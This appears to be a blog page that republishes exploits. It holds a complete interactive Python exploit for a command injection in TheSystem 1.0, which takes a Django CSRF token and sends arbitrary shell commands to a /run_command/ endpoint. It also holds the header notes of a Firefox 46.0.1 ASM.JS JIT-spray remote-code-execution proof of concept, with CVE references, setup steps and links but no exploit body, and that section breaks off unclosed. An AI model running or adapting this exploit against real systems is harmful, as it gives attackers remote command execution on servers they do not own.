TheSystem 1.0 – Command Injection Exploit

just for fun and practice purpose to write this exploit for ” TheSystem 1.0 – Command Injection

# Exploit Title: TheSystem 1.0 - Command Injection 
# Exploit author : chako
# Date: 2019-10-1
# Software Link: https://github.com/kostasmitroglou/thesystem
# Vuln Reported by: Sadik Cetin 
# Original Post: https://www.exploit-db.com/exploits/47441

#!/usr/bin/python
import requests

target = "http://127.0.0.1:8000/run_command/"

cmd = raw_input("Command># ") 
print cmd



while cmd != "exit" :
    client = requests.session()
    # Retrieve Django CSRF token
    csrfcookie = client.get(target).cookies['csrftoken']
    #print csrfcookie

    payload = {'command':cmd,'csrfmiddlewaretoken':csrfcookie}
    response = client.post(target, data=payload,headers=dict(Referer=target))

    if response.ok:
        print response.text
    else:
        print "error code --> ",response.status_code

    cmd = raw_input("Command># ") 
    print cmd

Demo Firefox 46.0.1 – ASM.JS JIT-Spray Remote Code Execution

<!--
 
    FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)
    *PoC* Exploit against Firefox 46.0.1 (CVE-2016-2819)
    ASM.JS float constant pool JIT-Spray special shown at OffensiveCon 2018
 
    Tested on:
    Firefox 46.0.1 32-bit - Windows 10 1709
    https://ftp.mozilla.org/pub/firefox/releases/46.0.1/win32/en-US/Firefox%20Setup%2046.0.1.exe
 
    Howto:
    1) serve PoC over network and open it in Firefox 46.0.1 32-bit
    2) A successfull exploit attempt should pop calc.exe
 
    Mozilla Bug Report:
    https://bugzilla.mozilla.org/show_bug.cgi?id=1270381
 
 
    Writeup: 
    https://rh0dev.github.io/blog/2018/more-on-asm-dot-js-payloads-and-exploitation/
 
 
    - For research purposes only -
     
    (C) Rh0
 
    Mar. 13, 2018
 

Reference :
Firefox 46.0.1 – ASM.JS JIT-Spray Remote Code Execution
https://www.exploit-db.com/exploits/44293/
shellcode2asmjs: Generate arbitrary ASM.JS JIT-Spray payloads
https://github.com/rh0dev/shellcode2asmjs